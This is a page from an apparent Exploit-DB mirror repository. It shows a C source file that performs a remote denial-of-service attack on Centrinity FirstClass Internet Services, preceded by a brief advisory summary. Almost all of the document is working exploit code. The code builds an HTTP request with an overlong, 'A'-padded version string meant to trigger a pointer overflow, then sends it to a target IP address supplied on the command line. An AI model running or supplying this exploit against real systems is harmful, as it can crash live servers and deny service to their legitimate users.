bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/windows/dos/23234.c
Offensive Security 1f79ff2236 DB: 2016-04-09 
3 new exploits

WordPress Freshmail - Unauthenticated SQL Injection
WordPress Plugin Freshmail 1.5.8 - Unauthenticated SQL Injection
Express Zip <= 2.40 - Path Traversal
Apple Intel HD 3000 Graphics driver 10.0.0 - Local Privilege Escalation
op5 7.1.9 - Remote Command Execution
2016-04-09 05:02:52 +00:00

94 lines
2.2 KiB
C
Executable file
Raw Blame History

source: http://www.securityfocus.com/bid/8793/info
A problem has been reported in the handling of overly long HTTP version string data by Centrinity FirstClass. Because of this, it may be possible for an attacker deny service to legitimate users of a vulnerable system. This may be due to an exploitable boundary condition error, though this is not confirmed.
/*******************************************
* FirstClass Internet Services Remote DoS *
*******************************************
discovered & coded by I2S-LAB
--------------------------------------------
This exploit uses a ptr overflow to remotely
shutdown the Internet Services of FirstClass.
CONTACT
_______
Fred CHAVEROT : fred[at]I2S-LAB.com
Aur=E9lien BOUDOUX : aurelien[at]I2S-LAB.com
URL : http://www.I2S-LaB.com
*******************************************/
#include <windows.h>
#include <winsock.h>
#pragma comment (lib,"wsock32.lib")
#define PerfectOverwrite 246
void main (int argc, char *argv[])
{
int len;
SOCKET sock1;
SOCKADDR_IN sin;
char *sav;
WSADATA wsadata;
WORD wVersionRequested = MAKEWORD (2,0);
printf ("- FirsClass Internet Services Remote DoS -\n\n"
"Discovered & coded by I2S-LAB\n"
"http://www.I2S-LaB.com\n\n");
if (!argv[1])
{
printf ("Usage : %s <IP Address>\n", argv[0]);
ExitProcess (0);
}
if (WSAStartup(wVersionRequested, &wsadata) ) ExitProcess (0);
if (!(sav = (char *) LocalAlloc (LPTR, 20 + PerfectOverwrite)) )
{
printf ("Error ! cannot allocate enough memory.\n");
ExitProcess (0);
};
lstrcat (sav, "GET / HTTP/1.1");
memset (&sav[14], 'A', PerfectOverwrite - 4);
lstrcat (sav,"DDDD\r\n\r\n");
sin.sin_family = AF_INET;
sin.sin_port = htons (80);
if ( (sin.sin_addr.s_addr=inet_addr (argv[1])) == INADDR_NONE)
{
printf ("Incorrect IP Address : %s\n", argv[1]);
ExitProcess(0);
}
sock1 = socket (AF_INET, SOCK_STREAM, 0);
printf ("\nconnecting to %s...", argv[1]);
if ( connect (sock1,(SOCKADDR *)&sin, sizeof (sin)) == SOCKET_ERROR )
printf ("connection failed!\n");
else
{
printf ("ok!\nSending crafted request...");
send (sock1,sav, PerfectOverwrite + 18,0);
puts ("ok!");
}
closesocket (sock1);
}
Reference in a new issue View git blame Copy permalink